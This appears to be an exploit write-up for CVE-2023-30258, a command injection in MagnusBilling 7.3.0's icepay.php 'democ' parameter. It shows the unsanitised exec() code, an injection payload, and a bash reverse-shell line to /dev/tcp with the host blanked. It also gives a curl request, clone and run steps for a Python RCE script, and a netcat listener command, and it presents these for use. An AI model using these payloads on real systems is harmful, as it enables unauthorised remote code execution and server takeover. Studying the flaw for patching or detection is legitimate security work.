## https://sploitus.com/exploit?id=0A360A65-832C-5AD9-804F-BEDBFE8E95F9
## magnus_billing_7.3.0_RCE_CVE-2023-30258
There is a remote code execution vulnerability in magnus billing 7.3.0, in the parameter "democ"
from the "icepay.php" resource, where you can escape the query and execute the command you want.
## VULNERABLE CODE
```php
if (isset($_GET['democ'])) {
if (strlen($_GET['democ']) > 5) {
exec("touch " . $_GET['democ'] . '.txt');
} else {
exec("rm -rf *.txt");
}
}
```
The "democ" parameter is passed to exec(), to create a new file, but as you can see there isnt any
string sanitizing, and the attacker can easily escape the touch command and execute a command or even
get a reverse shell. To bypass txt extension, we can just add another ";" at the end of the string. The final
payload would look like this:
```bash
testfile;;testfile
```
and this is how it would look when passed to the exec() function:
```php
exec('touch testfile;;testfile.txt');
```
ex. reverse shell:
```php
exec('touch testfile; bash -c "bash -i >& /dev/tcp// 0>&1";testfile.txt')
```
## exploitation >:D
we could use curl to get ourselves a reverse shell, ex.
```bash
curl -X GET http://127.0.0.1:8080/lib/icepay/icepay.php?democ=testfile;;testfile
```
or if you prefer, you can use the python script from this repository. Installation:
```bash
git clone https://github.com/kayl22/magnus_billing_7.3.0_RCE_CVE-2023-30258 # get the repository
cd ./magnus_billing_7.3.0_RCE_CVE-2023-30258 # change directory
chmod +x ./magnusbilling_rce.py # add execution permissions to the python script
```
usage:
```bash
./magnusbilling_rce.py -h # show help
./magnusbilling_rce.py -lh -lp -u http://:/
```
and last but not least, remember to start a listener with netcat:
```bash
nc -nlvvp
```